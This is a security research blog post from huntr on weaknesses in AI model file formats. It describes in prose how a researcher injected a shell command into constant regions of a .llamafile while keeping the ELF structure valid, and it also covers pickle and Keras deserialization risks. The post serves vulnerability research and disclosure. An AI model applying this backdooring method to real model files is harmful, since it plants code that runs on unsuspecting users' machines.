A Technical Deep Dive: Backdooring AI Model File Formats

Nov 4, 2024 By Dan McInerney & Marcello Salvati

Introduction

As AI and machine learning models become more embedded in modern infrastructure, everything from your smart fridge to who knows what else, the files running those models are starting to look like big, flashing bullseyes for hackers. While data manipulation or biases in model outputs may get the most attention, the files themselves—such as .llamafile —can also contain potential security weaknesses and nuances that hackers, researchers and internal security teams need to be aware of.

In this blog, we’ll explore how researchers can identify and report findings in model file types, using an insightful discovery by one of our huntrs, retr0reg, as a reference. While not a vulnerability per-se, it sure does shine a light on potential attack vectors lurking in these systems. Think of it as a crash course in identifying weaknesses before the bad guys beat you to it. You’re welcome.

What Makes a Good Model File Issue Report? (PSA)

When reviewing model files, such as .llamafile, it’s crucial to focus on potential risks in how these files are structured and processed. A well-documented issue report should address several key points to help developers and researchers understand the nature of the problem and its implications.

Precisely Define the Issue: Clarity is essential. Describe the problem in terms of how the file or model could be manipulated. This could involve scenarios such as remote code execution, memory overflow, or improper validation.
Include Reproducible Evidence: Always provide clear, step-by-step instructions or a proof of concept (PoC) that demonstrates how the issue can be replicated. Supporting this with sample code or payloads can help others verify and understand the issue better.
Analyze the Impact: Outline the potential consequences. Could this issue result in system compromise, data leakage, or arbitrary code execution?

Model File Vulnerabilities: Keras and Pickle Deserialization Attacks

Model file vulnerabilities aren't just limited to .llamafile. Other common file formats such as Keras (used in TensorFlow) and serialized pickle files in Python can also introduce significant risks:

Pickle Deserialization Attacks: Pickle is a Python module used for serializing and deserializing objects, but it’s dangerous if used improperly. Pickle deserialization attacks occur when untrusted data is deserialized without validation, allowing attackers to inject arbitrary code. This is particularly concerning in AI/ML environments where models are often serialized for sharing or storage.
Keras Model Vulnerabilities: In some Keras implementations, there have been cases where model files lack integrity checks, leading to potential execution of malicious code. These attacks typically focus on the underlying TensorFlow framework or improper validation of model weights.

Case Study: Retr0reg’s Llamafile Discovery

In one of our community’s reports, retr0reg identified a way to backdoor a .llamafile binary.

While not a complete 1:1 equivalent, you can think of this like backdooring traditional executables files (PE/ELF etc..) which is a known malware technique and has been known to the security community for a long time. See The Backdoor Factory and this blog for details on how this is possible in traditional executable files.

Discovery Overview

The .llamafile format, used to package executable LLMs (Large Language Models), supports the embedding of weights and configurations necessary to run the model across multiple platforms. By leveraging the inherent structure of the .llamafile, retr0reg found that malicious payloads could be injected into constant regions of the file without triggering typical integrity checks.

This issue arises due to the file’s reliance on APE (Actually Portable Executable), a format that packages applications into single files that can run across different platforms without modification. By manipulating specific sections of the APE structure, attackers could append harmful code that gets executed under the normal operation of the .llamafile.

To see the initial discovery in action and how retr0reg injected malicious payloads into the .llamafile, check out this PoC video:

Steps to Reproduce (In-Depth Breakdown)

The discovery hinges on exploiting static code segments within the .llamafile that remain constant across different versions and models. By injecting a payload into these constant regions and maintaining the file's overall integrity, retr0reg demonstrated how arbitrary code could be executed without breaking the ELF structure. Below is a more detailed, technical breakdown of the process.

Identify Static Code Segments:
Using tools like objdump or readelf, locate the constant sections of the .llamafile that are reused across versions. This may include portions of the APE (Actually Portable Executable) setup block and other data initialized on model startup. In this case, retr0reg observed strings and memory layouts that were consistent across various model files such as mxbai-embed-large-v1-f16.llamafile and llava-v1.5-7b-q4.llamafile.
Inject Malicious Code:
Modify these segments by appending a payload, such as a shell command, that will be executed during the model’s normal initialization phase. For this, retr0reg used a substitution-based injection method (using characters like && for command substitution). It's important to note that the payload size must match the original content to maintain file integrity, especially regarding the ELF entry points.
Maintain ELF Integrity:
Ensure that the modified .llamafile maintains its ELF structure. This requires careful manipulation of the file to prevent breaking headers, sections, or other ELF components. Tools like elfedit can be used to inspect ELF headers and ensure they haven't been corrupted during the injection process. If the ELF integrity is compromised, the model may fail to load, triggering errors such as "ELF entry point not found."
Test in a Controlled Environment:
Load the modified .llamafile in an environment where you can safely observe its execution. Upon starting the model, the injected payload should execute during the APE prep stage without disrupting the model’s normal operations. This payload can bypass many common security checks because it’s embedded within a trusted, unaltered portion of the file.

What to Look for When Assessing Model Files

When analyzing model file formats like .llamafile for vulnerabilities, focus on the following areas:

Improper Input Validation: One of the most common areas for vulnerabilities is the improper handling of inputs. Check whether the code which loads the model file format performs strict validation on values such as tensor counts, key-value pairs, or embedded scripts. An unchecked input can lead to buffer overflows, memory corruption, or even RCE, as seen in this GGUF example.
File Structure Manipulation: Many file formats, especially those supporting cross-platform execution like .llamafile, rely on specific structures (e.g., ELF or APE). Manipulating static or constant sections of these files can create exploitable entry points. Check if modifications in these regions can execute arbitrary code while maintaining file integrity.
Memory Management: Always review how memory is allocated when loading model files. Improper bounds checking can lead to heap overflows. Memory corruption vulnerabilities in these file formats can often be exploited by manipulating the size of arrays or fields read directly from the file.
File Parsing Flaws: Model file formats that parse large amounts of data, such as weight configurations or key-value pairs, are vulnerable to parsing flaws. In GGUF, for example, improper handling of these structures leads to heap overflows when key-value pairs exceed expected boundaries.
Metadata Manipulation: Models often contain metadata and configurations that dictate their behavior. Tampering with these can lead to security issues.

Disclosure and Mitigations

We contacted Mozilla, and the information from this report was shared with the Llamafile’s lead developer. While they were impressed that our researcher was interested in diving into the APE file format, they mentioned that they did not consider this to be a vulnerability.

Conclusion

Model file formats are a crucial component of AI/ML infrastructure, and their security cannot be overlooked. By understanding and identifying potential vulnerabilities in formats like .llamafile, Keras, and serialized pickle files, researchers and hackers can help build safer, more secure AI systems.

At huntr, we encourage our community to explore these hidden vectors of attack. Whether it’s improving validation checks, implementing memory management safeguards, or finding new exploits in file structures, every contribution helps strengthen the field of AI/ML security.

Think you've got the chops to uncover the next model file vulnerability? Time to step up and prove it. Submit a model vulnerability and show us what you've got!

Stay tuned for more insights from our community, and happy hunting!